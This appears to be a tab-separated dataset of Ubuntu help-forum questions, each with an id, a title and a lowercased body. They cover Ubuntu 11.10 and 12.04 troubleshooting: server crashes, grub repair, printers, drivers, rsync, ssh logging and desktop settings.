112584	how to debug a server that crashes once in a few days ?	one of my servers crashes once in a few days . it does low traffic static web serving + low trafic dynamic web serving ( php , local mysql with small data , apc , memcache ) + some background jobs like xml file processing . the only clue i have is that a few hours before the server dies it starts swapping ( see screenshot http : //awesomescreenshot.com/075xmd24 ) the server has a lot of free memory . server details : ubuntu 11.10 oneiric i386 scalarizr ( 0.7.185 ) python 2.7.2 , chef 0.10.8 , mysql 5.1.58 , apache 2.2.20 , php 5.3.6 , memcached 1.4.7 amazon ec2 ( us-west-1 ) how can i detect the reason for the server crashes ? when it crashes its no longer accessible from the outside world .
112586	please suggest one free log manager which will help me to audit all system and services logs in organized format ?	i have ubuntu server 11.10 but without gui , so it is fine even if that suggest a software or something like that which will intern help me do that . it will be grate if that software can export logs in excel sheet format , using some command or something . thanks a lot in advance.. rishee : )
112588	mpd listening on port 6600	i find on netstat that mpd is listening on port 6600 . i play all my media files on vlc . i do n't remember installing this , and its not in my startup applications . is mpd even needed ?
112591	how do i get a canon pixma ip3600 printer to work ?	i have a printer canon pixma ip3600 . following you steps this was installed without problems , but it does n't print . the test page is sent to the printer and i can see it in the spool , but it never prints . what can be wrong ? i run ubuntu x64 .
112592	separate /boot partition ?	i was told to start partitioning during a linux install with creating a 300 mb sized /boot partition . does a separate /boot partition provide any advantages for the average user ?
112595	how do i get alt-tab to cycle through all open windows on gnome classic ?	i am using ubuntu 11.10 with `` gnome classic ( no effects ) '' at login . using alt+tab cycles between windows on current desktop . how can i set it to cycle through all open windows ? well , i have done as proposed , here is what happened : when i pressed alt+tab , it still showed only window icons from current desktop . furthermore , i could only switch between the two most recently used windows with a single tab press . releasing the tab and pressing again closed the window chooser . another try after logout-login gave another result : pressing alt+tab just showed the main menu . more ideas are welcome .
112596	bridge/route a wireless connection	i was trying to follow this guide : https : //help.ubuntu.com/community/easywirelesstowiredconnectionsharing but it does'nt seem to be upgraded . the dhcpd.conf file is in /etc/dhcp and not in /etc/dhcp3 . but a worse problem is that i ca n't find /etc/default/dhcp3-server at all . how would i do this in ubuntu 11.10 ?
112598	how do i create a launcher item to show all open applications ?	i need to build a unity launcher item to activate compiz scale . how do i do that ?
112599	setting directory file permissions in ubuntu using chmod	whats the equivalent command of this ( fedora command ) for ubuntu : chmod +a `` www-data allow delete , write , append , file_inherit , directory_inherit '' app/cache app/logs when i try the above with ubuntu ( 10.0.4 lts ) , i get the error message : chmod : invalid mode : `+a' try `chmod -- help ' for more information .
112601	why access is denied to windows users when saving files in a dir shared with samba ?	i installed ubuntu server 11.10 + samba i 'm using webmin to share folders in samba and give permission to users . in windows xp i can log to samba and open the shared folder but when i save a file it says `` access is denied '' . why ? please help
112602	ugly openjdk fonts	is there a way to make openjdk 7 fonts look exactly the same as oracle jdk 7 fonts ? i use intellij idea and today tried it with openjdk , but fonts look ugly . i tried several tricks with awt.usesystemaafontsettings=on / lcd and swing.aatext=true ? but with no luck - it is still ugly . i tried to google that issue but there is not much info . i want just the same fonts as in oracle jdk ...
112608	how do i share my laptop 's wireless connection with my android phone ?	i want to use the internet connection of my wired ubuntu 10.04 machine in my samsung note android phone through wireless . i have usb wireless adapter with chip set rtl8187b . i do n't want to change my original android into cynogenmod or something else . i do n't want to be superuser in android . i do n't want to disturb my android till warranty period of my mobile phone . how it is possible ? any idea ? please give your comments : ) i tried infrastructure/adhoc wireless connections with wpa key security . but , android is not detecting wireless signal from my ubuntu computer . the usb wireless devise is connected well in computer with driver support .
112609	no login screen after logout	this is my first question about ubuntu : ) since this morning when i log out ( top right icon , log out ) i do n't get the usual gui login screen but i get this instead : if i log in with the ubuntu 2d option enabled everything works flawlessly . can somebody please suggest some step to take to understand what is going on ? it looks like the x server gets stuck ... i can provide logs or whatever can be useful . thank you in advance for any suggestion . gia
112611	can i use silverlight in firefox ?	i know that we can use moonlight to play silverlight content on website . however , i know that moonlight can install on latest firefox . however it does not reliably work actually after i follow their procedure to install it again . moonlight extension not working with new firefox versions does anyone able to play silverlight content in firefox using 11.10 ?
112613	use ubuntu as active directory server ? ( windows users login-security )	we are a very small business ( 5 people ) and all of us use windows 7 on the desktop . i 'm planning to run an ubuntu box to share internet connection and use a proxy . i 'd like also to expand this box to use it as an active directory server so users can , when they login on their workstations , get authenticated by the ubuntu box . is this possible ?
112616	ftp connection problem ( could not retrieve directory listing )	fiends i have installed an ubuntu server and tried to connect with a ftp client . the connection established but generated the following error : 227 entering passive mode ( 192,168,1,97,206,30 ) . estado : el servidor enviรณ una respuesta pasiva con una direcciรณn no enrutable . usando en su lugar la direcciรณn del servidor . comando : mlsd error : conexiรณn superรณ el tiempo de espera error : error al recuperar el listado del directorio what can i do to solve this . many thanks for any help . [ translated error ] error : could not retrieve directory listing address for passive mode is not routable
112621	log in manager does n't appear after editing /etc/x11/default-display-manager	i have ubuntu 11.10 , and i installed kde and i choosed kdm mistakly , as mentioned here i did this procedure pretty simple . open the file /etc/x11/default-display-manager with your editor of choice . make sure you invoke that editor as root , otherwise it wo n't work . in that file there 's a single line : /usr/bin/kdm change that to /usr/bin/gdm and save the file . reboot and you 're in gnome . now , after booting , the log in manager gdm or kdm did n't appear . how can i fix this ?
112622	how do i get thunderbird to give notifications for only my inbox	i 'm using thunderbird with gmail imap . i have several filters setup since i receive a lot of email from several mailing lists . the notification for new mail is always lit , since i always have unread email . but i would like to restrict the new email notification to only my inbox for gmail or a specific subset of folder that i consider important . how would i do this if it is even possible ?
112628	iphone usb tethering with 11.10	i found a solution : http : //www.ubuntugeek.com/iphone-tethering-on-ubuntu-9-10-karmic.html but this ppa is not available for oneric . how can i make tethering with my iphone on ubuntu oneric ?
112632	is there a digital protection system in place to prevent piracy of commercial applications ?	how are app ( lication ) s published through this service protected against piracy ? i mean , if they are managed through the package system then it is easy to find out what files are included and repackage them for distribution through a different channel . is there any kind of digital protection system available to developers ? thank you .
112635	how to fix unmet dependencies problem with openjdk	i get this when i try to install openjdk 7 the following packages have unmet dependencies : openjdk-7-jre : depends : openjdk-7-jre-headless ( > = 7~b147-2.0-0ubuntu0.11.10.1 ) but it is not going to be installed depends : libaccess-bridge-java-jni ( > = 1.26.2-6 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i fix this problem ? even running sudo apt-get -f install and dpkg -- configure -a in terminal i still get the same error
112639	scp / ssh log on ssh-server	i work in college network . i have shared my computer password with few friends . so any of them can ssh/ scp on my system . is there any way to generate the log of connection ( if some one make connection through ssh or copying using scp ) data . ( just in case to see what they do on my system ) ? i am using openssh-server in ubuntu 10.10 system . it seems to me that we can generate log or can get notification for ssh connection ( by looking ssh_connection parameter ) but no way for scp , or is there any ? edit : i little bit of solution : create a rc file inside .ssh directory and create log from that rc file .
112641	how to turn ubuntu-11.10-alternate-i386 version to the regular ubuntu-11.10-desktop-i386	i just download ubuntu-11.10-alternate-i386.iso . that was a mistake : d but i would like to find out how to make it normal ( like ubuntu-11.10-desktop-i386 ) . it is possible ? what packages should i install ? thanx in advance : d
112645	how to identify an application executable from ps	if i execute ps -ef | grep java i get the following noaccess 12144 908 0 apr 28 ? 697:47 /usr/java/bin/java -server -xmx128m -xx : +useparallelgc -xx : parallelgcthreads=4 though , in this server we have many java applications running . how do i identify which .jar was invoked by the ps output is showing ?
112650	linux+ certification	i 'm currently a student in college studying computer networking . out of all the things i 'm studying , my strong suit seems to be linux . with spring break coming up i would like to use the time to study for my linux+ certification exam . i 'm looking for suggestions for good sites , books , etc , from those who are linux+ certified . any suggestions are appreciated .
112652	how do i use multi-touch gestures on a macbook air ?	i am using ubuntu 12.04 on my macbook air ( 13 '' mid 2011 ) and it works lovely ! are there any news or possibilites to use multi-touch gestures ? but to now i am using the system out of the box . one and two finger gestures are working .
112655	what is the meaning of this upstart init error ?	$ start playframework start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.6 '' ( uid=1000 pid=1080 comm= '' start portal `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) i 'm trying to get playframework to start using this upstart script . i saw similar errors posted around the web , and here , but never found a general explaination of what they mean . does it mean the process that 's being started returned an error ? what 's the general way to debug these kinds of errors ?
112658	how to format disk without installing system ?	i want to move system to another machine . i have full backup in .tar.gz file as described here . now i need to partition hard drive , install grub and unpack archive . how to do that ? when i tried to use live cd it started installing system immediately after partitioning and i need clean partition to unpack my archive to .
112663	synchronize local filesystem bookmarks between nautilus and dolphin	both nautilus and dolphin offer a column on the left to place local filesystem bookmarks or links . all the kde-apps share dolphin 's bookmarks and the gtk-apps share nautilus ' bookmarks . how can i get them synced ? if this is not possible , how can i convince kde-apps to use the gtk-file-chooser ( for opening and saving files ) .
112666	multi monitor setup	i 'm having some problems with a multi monitor setup in ubuntu : the launcher will appear on the laptop monitor if the external monitor is n't plugged in on startup . if the external monitor is plugged in on startup it will appear on that monitor . is there a way to make it consistently appear on one screen , or if possible duplicate the launcher on both monitors ? if a flash video is playing on the external monitor and i make it fullscreen , the video will appear fullscreen on the laptop monitor . conversely once the video is made fullscreen on the laptop monitor - if you click on the external monitor it comes off fullscreen . does anyone have any solutions to these issues ?
112668	how do i force rhythmbox to automatically organise my music files into folders ?	how do i force rhythmbox to automatically organise my music files into folders ( corresponding to the artist and album ) in ubuntu 12.04 beta-1 . is this functionality currently missing from the new version ?
112671	how do i know i 'm not using any xfce programs ?	what is xfce ? how do i know what programs are using it ? because another answer told me to remove xfce files , and i want to know if i 'm using them . i was told to remove a bunch of xfce related programs to fix an issue with google-chrome , how can i know that i 'm not using those programs ?
112677	why cant i change my launcher icon size ?	when i set ubuntu as a dual boot i only had issues with unity crashing when using ccsm.earlier i was trying to resize my launcher icons with ccsm and then with ubuntu tweak and both of them made unity crash with no bars.on a brighter note i do have the desktop cube , lol.anyone have a workaround for this situation ? i have switched to a better computer with different graphics card , both cards in each computer were both ati though
112678	interactive desktop wallpapers	is there any interactive wallpapers like for example a background of a pond with some fishes and you could click on the fishes . i know this will consume a little more ram , cpu and video but it would look really nice . i know there are slideshow wallpapers and wallpaper series that depend of the day of time , but in this case , wallpapers that the user can interact with .
112679	enabling compiz effects on gnome3	how can i enable compiz effects on gnome3 on ubuntu 11.10 ? i already installed ccsm and compiz-plugins-extra . what else should i do ?
112681	libreoffice image problem	why my libreoffice ca n't show images . it showing images like this : can someone help ?
112683	disable differences in login handling ( non-interactive , interactive etc . )	i 'm always having trouble with rvm installs and non-interactive vs. interactive shell sessions . if the session is n't interactive i 'm usually getting the command not found error on different programs/functions in the rvm/ruby toolchain ( i.e . gem , rvm , ruby etc. ) . there are three solutions to the issue i 'm aware of : add/remove some lines from .bashrc for each user . the changes depend on the version of ubuntu typing bash -- login before working with rvm to get a interactive shell changing the 'run command as login shell ' option in gnome-terminal all those solutions are n't exactly what i 'm looking for because i have a couple of hosts with different versions of ubuntu and for some applications the solutions outlined above do n't work ( i.e . daemonized chef configuration management suite ) . as far as i could trace the problem down this is based on the fact that shell scripts in /etc/profile.d are only run if the user logs into a interactive shell session . which seems not to be the case if a daemonized process runs or if i or an application logs in trough ssh . what i 'm basically searching for is a way to unify all different kinds of shell sessions to execute scripts in /etc/profile.d . ideally this solution should work for all users that are able to login , and for different versions of ubuntu ( atm in use : 10.4 , 11.10 ) . it would also be good if it could be easily be set up using automated scripts or chef recipes . as a note : i do n't know if not-running scripts in /etc/profile.d is the sole problem i 'm facing , i know tough that doing a bash -- login usually fixes my issues .
112684	why does ubuntu add a .5 '' margin to the top when printing to my hp psc-750 ?	it 's that time of year again when i 'm trying to print off all my tax forms . when i print to my printer , an hp psc-750 , from ubuntu , i consistently get a 1/2 '' margin at the top of the document . according to this page however , the top margin required by the printer is only .07 '' . in previous releases of ubuntu ( such as the 10.04 prerelease i was running this time last year ) , it appears that something in the print pipeline would automatically scale the output to fit these margins . this year , 12.04 beta is trying to use the whole page ( unless i manually tell it to scale and manually tell it to use a 1/2 '' margin ) , resulting in part of the text being cut off . does anyone know why , when using the default print driver provided by ubuntu , the printer would behave this way ? i see the same behavior whether i have the printer connected directly to my laptop , or if i use my debian stable server as a print server . is this a problem with the printer itself ? the strange 1/2 '' top margin has always been a problem since it was first purchased , but i 've only ever used it with linux , never with windows , so i ca n't say whether this is a linux-specific problem .
112686	log ssh activity	all , i have an ubuntu host that accepts ssh connections . how can i log all commands that are run on a specific account that logs in via ssh ? thanks
112691	how to see from the terminal what file i am downloading from firefox or chrome	i want to see from the terminal what file i am downloading from firefox or chrome . is there a way to monitor what files i am downloading from the terminal ? note that i want to see this while downloading it . a way to see what is being downloaded while doing the download .
112697	which packages write /etc/lsb-release and /etc/issue ?	what packages write or replace /etc/lsb-release and /etc/issue in ubuntu or debian ?
112699	how to compare cpu speeds	i found this attribute called `` bogomips '' ( bogus millions of instructions per second ) while doing cat /proc/cpuinfo and after seeing the definition : the number of million times per second a processor can do absolutely nothing i was left with the question , how can i know , preferably by terminal , which cpu is faster or can process more per second given the cache , cpu mhz and other properties that can affect the speed or process of it . in my case i have 2 laptops : the amd is a turion ( tm ) 64 x2 mobile technology tl-60 - gave me 4001.06 bogomips and the intel is an intel core 2 duo t550 - gave me 3326.05 bogomips . i mention again the bogomips since it was the only `` form of measure '' i found when running the command but just to see if anybody has a command for this it would be great .
112700	how can i install ubuntu one for windows onto a memory card or usb flash drive ?	is there a way to install the ubuntu one app for windows onto a memory card or flash-drive ? edit : i want to do this because it would be handy to have u1 on my school laptop in order to keep all my documents synced etc . sadly , i do n't have administrative rights , so i ca n't install it onto the hard drive itself . copying it over does not work since it requires that vcredist_x86.exe is installed , but as i said ; i do n't have admin privileges .
112705	how do i make powertop changes permanent ?	i 'm on a compaq 615 and it 's fan is loud . not much you can do about that but i 'm trying to keep the cpu/gpu as cool as possible . this is what powertop has to say : if i change all of them to `` good '' , the changes do n't survive a reboot . i added the line to the `` grub '' -file as suggested here how do i make the powertop suggested `` tunables '' permanent ?
112711	how can i force applications not pinned to the launcher to appear below applications that are pinned ?	i normally use super+number to open my frequently used applications which are pinned to the launcher , which is quick and convenient as long as the numbers remain consistent . however , when i run other applications , some ( not all ) of them are added above the last pinned application , meaning my customary super+n shortcut for that application no longer works . is there any way to force other applications to be added to the launcher below all my pinned applications ?
112716	sound volume indicator in top panel is resetting top panel upon mouse click or hover	i 've installed the system monitor indicator applet and weather indicator applet . all else is the same . do you think compiz is the problem ? can i reinstall the volume indicator applet ?
112717	rsync copies files from working directory in addition to the requested ones	the following is a snip of output from bash -vx on my backup script \+ rsync '' -avushi -- stats -- progress -- log-file=/home/bigbird/temp/rlog/rlog1.txt /media/dataspace/data/webcasts/ /media/work/data/webcasts sending incremental file list i 've been doing rsyncs like this forever and i just saw this problem in the last month or two . this one is running on kubuntu oneiric , but i think i may have seen it on kubuntu lucid as well . the script is being run from /home/bigbird/bin it works perfectly except that it additionally transfers all the files from my current directory to the destination . i also have a second rsync later in the script that does the same thing to another directory . i just ran it again from another directory and it copied all of those files instead . i do n't see a `` . '' in the source anywhere etc . i did a set | less looked at all my ~/bin files looked at all my aliases i do n't have a clue as to what would be causing this . where do i look for the problem ?
112722	command `` find -name '' must be enclosed in quotes or it does n't work . why is that ?	find . -name *.rb does n't work on my ubuntu i have to do find . -name `` *.rb '' to get it to work . why is that ?
112724	how to disable synaptics pinch-to-zoom support in evince ( pdf viewer ) ?	my friend experiences this bug : https : //bugs.launchpad.net/ubuntu/+source/evince/+bug/875359 but most of the time zoom is activated unintentionally when using two-fingers scrolling on a synaptics touchpad . can i disable this zoom feature ?
112726	ubuntu failed during upgrade	the power failed while upgrading and now it does n't work , it just hangs while some console text is there ( it stops at checking battery status ) i do n't want to reinstall ubuntu again because all my programs , drivers and settings are on the old install and it would take me more than two weeks to recover them does anyone have any ideas to help me
112727	how can i increase my disk space when ubuntu is installed alongside with windows ?	some time ago i reinstalled windows , formating and deleting every partition . i then made 3 partitions : one only for windows os ( about 25gb ) one for ubuntu os ( about 25gb , if i remember corectly 10gb for swap memory and 15gb as an ext4 partition ) ( not sure if it was that , hope i am not wrong ) and like 200gb for all the other stuff . recently i got a message that i am running out of disk space . my question is : is there a way to resize the 200gb partition and add more space for the ubuntu partition ?
112729	enable automatic login on a headless server	is there a easy way to allow a automatic login on a non-sudo account to a server that requires physical access when used . i want to turn on the computer and have it automatically log in to my not sudo user without me entering any user names and passwords ?
112731	win7 - > ubuntu 11.10 - win dynamic disk raid 1	i imaged my win7 system disk via ntfsclone + dd ( mbr ) to one of my win7 dynamic disk raid1 disks from within the ubuntu livecd instance ( only wrote to one of the disks in the win7 raid1 array ) . i did this with success and was then able to reload the image into virtual box after fully installing ubuntu 11.10 . now , i 'm trying to setup the raid1 software raid in ubuntu ( installed over old win7 system drive ) via mdadm and i 'm wondering if i can do this and have it resync the data on both drives without destroying the dynamic disk raid config and without any data loss ( most important ) ? i realize i should have probably done this from the get go ( even in livecd ) ... if this is n't possible - perhaps , i can re-partition the second raid disk that was n't written to and then have it resync ? or should i use dd to re-image first raid drive - > 2nd drive and then run mdadm ? goal here is to have a dual boot ubuntu/win7 system which can both read/write from the raid1 array ... also , do n't want to use fakeraid , rather , software raid
112732	how do i install nvidia drivers in ubuntu 11.10	i love ubuntu but my # 1 issue with the 173 nvidia drivers that i have installed is the size of my desktop icons ! they are way too big ( everything is too big ) . i would like to improve on the resolution my display is set to by upgrading to a better driver ! read my pastie please it is full of system info and logs ( about the issue at hand ) http : //pastie.org/3589050 i need help please i ca n't afford to upgrade to new hardware right now <
112744	black screen appears when booting new install of 11.10 on my desktop , can not access grub menu to fix	i installed 11.10 on my desktop pc but get a black screen after the bios screen when i try to boot it . i was able to run 10.04.04 on my hard drive before installing 11.10 and i am also able to use 11.10 on my usb pendrive and cd rom . i 've tried unplugging all usb devices before booting and also upgrading from 11.10 to 11.10 . holding the shift key from the bios screen does n't allow me to access the grub menu to try : highlight the first entry , press “e” to edit it . navigate to words “quiet splash” , delete them and type “nomodeset” in their place ( without quotes ) . press ctrl + x to continue boot . once on the desktop , go to system > administration > additional drivers and activate the recommended drivers . so running 11.10 on my pendrive , i tried editing /etc/default/grub , commenting out the grub_hidden_timeout setting by putting a ' # ' in front of it to display the grub menu and setting grub_timeout setting to a value greater than or equal to 1 e.g . grub_timeout=10 . however , when i run sudo update-grub , i get : /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) i get the same error with update-grub after : sudo mount /dev/sda1 /mnt and after : sudo grub-install -- root-directory=/mnt /dev/sda reboot sudo update-grub other suggestions to fix the update-grub problem : open synaptic , then purge all the related grub installed packages and reinstall grub-pc then and finally : sudo update-grub or use grub customizer http : //ubuntuforums.org/showthread.php ? t=1195275 what would be the best way to approach this ? i 'm concerned about purging `` all the related grub installed packages '' but if it 's true some files are corrupted this would seem necessary . also , was i executing the correct commands i.e . with mount and grub-install , before running grub-update ?
112745	run a script each time i login	i have a script to automatically connect to a server and want it to run each time i login with my user account . if possible make the script wait a few seconds to connect until the network can be connected .
112750	transcend storejet external hdd ( 1 tb ) not recognized	i have ubuntu 11.10 installed on a delll e6520 ( as a dual boot with windows 7 ) . when i plug the 1 tb transcend storejet into the side left usb port , lsusb finds it , but it does not show up in fdisk or df ( and of course , it does n't automount ) . usb flash drives work fine ( automounting properly ) ; a western digital external drive does n't automount quite properly but does show up in fdisk ( and can be mounted manually when recalcitrant ) . dmesg lines : [ 901.270921 ] usb 2-1.3 : new high speed usb device number 4 using ehci_hcd [ 901.535885 ] usbcore : registered new interface driver uas [ 901.546282 ] initializing usb mass storage driver ... [ 901.546548 ] scsi4 : usb-storage 2-1.3:1.0 [ 901.547000 ] usbcore : registered new interface driver usb-storage [ 901.547007 ] usb mass storage support registered . lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 1bcf:2802 sunplus innovation technology inc . bus 002 device 003 : id 0a5c:5800 broadcom corp. bcm5880 secure applications processor bus 002 device 004 : id 152d:2329 jmicron technology corp. / jmicron usa technology corp. jm20329 sata bridge [ yes , it 's bus 2 , dev # 4 ] usb-devices ( relevant lines only ) : t : bus=02 lev=02 prnt=02 port=02 cnt=01 dev # = 4 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=152d prodid=2329 rev=00.00 s : manufacturer=jmicron s : product=storejet transcend s : serialnumber= < omitted > c : # ifs= 1 cfg # = 1 atr=c0 mxpwr=2ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage sudo lshw -c disk does n't find it ( shows only /dev/sda ) ; likewise sudo fdisk -l ; sudo parted -l shows only the partitions on the internal drive /dev/sda . this is quite likely a storejet-specific issue . does it need a special driver ? does it need to have another module blacklisted ?
112754	gnome shell lags after a while	i have ubuntu 11.10 64bit with gnome shell running ( nvidia-current 295.20 on 9800gt ) and notice that after a while the gnome shell start s to lag a bit . when i say lag , everything works fine and is snappy until i open the overview ( windows | applications ) or show my notification area - then it starts to lag quite a bit , until i leave that view and go back to normal usage . this is usually easily remedied by alt+f2 'r ' to restart gnome shell - but something must obviously be causing this , a bug maybe ?
112755	custom login backgrounds do n't show up	i want to use a custom login back ground on kubuntu and i have the settings pointing to the picture i want but it just shows up as black on the login screen.any ideas why ?
112759	boot partition does not get updated in lvm setup	i am on the ubuntu 12.04 64bit beta right now . having a more exotic partition setup : - efi - /boot partition ( fat ) - lvm ( encrypted ) | |- /root |- /home |- /swap now i noticed that my boot partition does n't get updated by the update manager . thus new kernel images etc . get downloaded but to another /boot folder on the /root partition . same is happening when i try to make changes to grub from cli , grub-update only applies to the /root-/boot stuff , leaving my boot process uneffected ... the whole setup has been done on a fresh install using the alternate cd/dvd . if i remember correctly i ran into this issue on 10.04 lts , too ( never solved it there because we went on using centos ) . any insights , tipps or solutions ? thanks . cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/agw -- x220-root / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=8ebb-0acf /boot/efi vfat defaults 0 1 /dev/mapper/agw -- x220-home /home ext4 defaults , user_xattr 0 2 /dev/mapper/agw -- x220-swap_1 none swap sw 0 0
112761	dualboot ubuntu 11.10 and windows 7 . want to make sure grub resume the right os after hibernate	i installed windows7 and ubuntu 11.10 on my asus laptop . i have a large data partition ( ntfs ) shared by both os , so i want the laptop wake up to the original os after hibernate . however , grub does n't seem to have a notion of which os started hibernate . is there some way to inform grub the os started hibernate . here is my idea ( hopefully , someone has better ideas way ahead of me ) , but do n't know where to start : on ubuntu , before going into hibernation , set grub_timeout=0 and run grub-set-default to ubuntu . this way , next time grub has to boot/resume into ubuntu . upon resume from hibernate or at shutdown , set grub_timeout=10 ( or some other non-zero value ) . but this only solves half of the problem ( if the idea is doable ) . i still do n't know how to set grub default before w7 hibernate . really love to head suggestions .
112762	where i can find a summary of ubuntu 's current functionality on touch screen devices ?	is there an ubuntu site where i can find a summary of ubuntu 's current functionality on touch screen devices ? and , hopefully , a list of touch screen devices still in production that it will run on ?
112763	picasa 3.9 login fails with 2-factor authentication	i 've installed picasa 3.9 via the instructions at webupd8 , however the login window keeps failing with the message , `` you must be connected to the internet to use this feature . '' if `` try again '' is tried i 'll successfully pass the first login screen of username and password . next i 'm prompted for the verification code which then takes me back to the `` you must be connected to the internet to use this feature '' screen again .
112774	how to get support for paid software from ubuntu software center	after buying and installing a game via the ubuntu software centre , i find the software does not work . but where do i turn to for support ? the game company says it does not support its game ported to linux as they seemingly where not involved in that . ubuntu does not seem to provide support unless i pay for it ( again ) and it seems totally unfair to bug the user community with this issue . i 've paid for the software after all ... there is a serious flaw in how canonical has integrated free and paid software into one app store type thing , without transparent support info ( where to get it ) for paid software . or am i missing something here ? ?
112775	focusing a specific application instance by code ?	i 'm writing an application using python and gtk3 . this application will open instances of other applications , such as gedit . now , i 'd also want my application to be able to focus each of those instances . my application is specifically targeted at unity . how do i do this ?
112779	grub skipped in dual boot	i 've downloaded the latest ubuntu , 12.04 . i have windows 7 professional installed on my laptop , 1 physical hd divided to 3 partitions ( c : , d : and system reserved ) . i shrank d : drive and had 60 gb of unallocated space . rebooted from ubuntu install cd and installed it with the option of install alongside windows 7 . after installation is over , windows loads automatically ; not grub , ubuntu does n't show up in the boot tab in msconfig . done this several times , same result always . am i doing something wrong ? a while back when i installed 11.10 , i had different issues ( grub wo n't load , only grub4dos ) but eventually i managed to install it . now , after formatting and reinstalling windows 7 ( original , not that it matters ) , i 'm stuck . any suggestions ? thanks !
112782	is there a windows briefcase equivalent on ubuntu ?	many people ask what the point of briefcases on windows is . basically , it 's a fast and easy way to sync documents between removable storage and your pc ( that is n't cloud based ) . i keep my school documents on both a flash drive and a directory on my pc at home , just in case . i frequently edit both , editing the flash drive 's files at school when i ca n't access my home pc , and the ones at home when i 'm too lazy to find my flash drive . when i want to sync the files , i can just plug the drive in and click `` update briefcase '' and files will be deleted , created , or updated as i have changed them in either direction , into or out of the briefcase . is there a simple , easy to use equivalent i can use on ubuntu ? thank you !
112783	invalid utf-8 as username ?	in my top panel , my username shows up as `` [ invalid utf-8 ] '' . yet , on the login screen , it is correct . i had this problem once before and i was able to fix it , but i ca n't remember where i found how to do it . does anyone have any ideas ?
112784	de-specific startup applications ?	i want certain applications ( such as indicator-multiload ) to run at startup only if i sign into unity , not gnome-shell . i also want some other applications to only start in gnome-shell ( like shutter ) . is there , say , something i can add before the command in `` startup applications '' that does this for me ? or do i need to install some sort of extension ?
112785	rails application directory has different $ path value than other directories on the system	i recently installed rails 3.2.1 ( gem version 1.8.7 ) running on ruby 1.9.3 on ubuntu 11.10 . i installed ruby , rails , and gem using rvm . i currently only have the one version installed . when i type `` ruby -v '' in a normal directory i see 1.9.3 as expected and when i type rails -v i see 3.2.1 as expected . this allows me to type `` rails new sample '' to create a rails application called sample . if i cd into the `` sample '' directory though and type `` rails server '' it tells me rails is not installed . so i checked the $ path variable and it is not what i expect to see . here is the output as i currently see it . if in the `` sample '' directory i type `` rvm -- default use 1.9.3 '' , rails is once again recognized . does anyone have any idea how this occurs or an idea of what to start searching for ? thanks in advance .
112787	stuck on page in install process ( xubuntu )	i am a newbie to ubuntu and linux in general and i am having extreme trouble installing xubuntu on my computer . the computer i am attempting to install on is a gateway with windows xp home edition 2002 service pack 3 and has an intel pentium 4 processor . the cd i have with xubuntu on works perfectly fine , and i know this because i have tested it on another machine . everything works fine until i select what i want to do from the booted disk . after selecting `` install xubuntu '' i am brought to a terminal-like area in which i can not type that lists what i believe to be system functions . ( e.g . [ 5.764016 ] note : kthrotld [ 36 ] exited with preempt_count 3 , or code : bad eip value . ) i am stuck at this area and am forced to then turn off my computer manually . please help !
112789	ethernet and wireless do not work on lenovo w520 under ubuntu 10.04.3	an ubuntu newbie installed caelinux 2011 which is based on ubuntu 10.04.3 lts 64bit side-by-side with windows 7 on lenovo w520 . although both ethernet and wireless cards work on windows 7 , they do not on ubuntu . the cards are intel ( r ) 82579lm gigabit network connection and intel ( r ) centrino ( r ) advanced-n 6205 , respectively . where the drivers can be found and how to install them ? thanks !
112790	keyboard layout asus eeepc 1015	i 'm new to linux and i 'm trying to use ubuntu ( 11.10 ) on my netbook ( asus eeepc 1015 ) trough usb boot , but my keyboard layout is all messed up . it 's like the `` o '' key is 6 , the `` k '' is 2 and go on . i 've searched on the keyboard layout settings for a proper layout , but no luck . is it a prob from booting from usb or there is a drive download or something to fix that ? thx
112800	why is python running at over 90 percent on cpu all the time in ubuntu 11.10 ?	i just checked my processes over last 3 hours and python was running over 90 percent , sometimes 110.whats causing this ? it says something about a checkbox running when i hover over it.i uninstalled two apps-onboard keyboard and system testing and it seems that python is eased off and not even listed in processes.is this a bug or can anyone tell me what python does exactly ? whats a checkbox ? i think the last thing i tried to do before this happened was run system testing and testing halted.when i closed it out then reopened it had a box open saying another checkbox was running
112801	do i have to set up mail for ubuntu to be able to mail users ?	i remember debian automatically sending mail to users ( to report a failed sudo authentication attempt , for example ) . on ubuntu is mail of some kind automatically set up ? i created a cron job , and nothing is appearing in /var/spool/mail . if there 's a standard/obvious way to set up mail in ubuntu , what is it ?
112802	can not receive updates or finish upgrading after interrupted 12.04 install	the problem started when i was trying to download the 12.04 beta 1 but did n't have sufficient time to complete the install . as i try to upgrade or re-download 12.04 i get the message `` not all updates can be installed '' with the choice to partial upgrade or close . partial upgrade gives me : an upgrade from 'precise ' to 'oneiric ' is not supported with this tool . close gives me : software index is broken it is impossible to install or remove any software . please use the package manager `` synaptic '' or run `` sudo apt-get install -f '' in a terminal to fix this issue at first . the synaptic suggestion does n't work as well . the command gives me e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . any suggestions ?
112805	black macbook webcam not working	i have a 2006 13 inch macbook that i put ubuntu on after buying a new hard drive . everything is working great , however , i ca n't seem to get the webcam to work . i was pretty sure i 'm missing a driver for it , but when i looked into it , it looked like the driver was already there . maybe the file got corrupted or something ? any suggestions ?
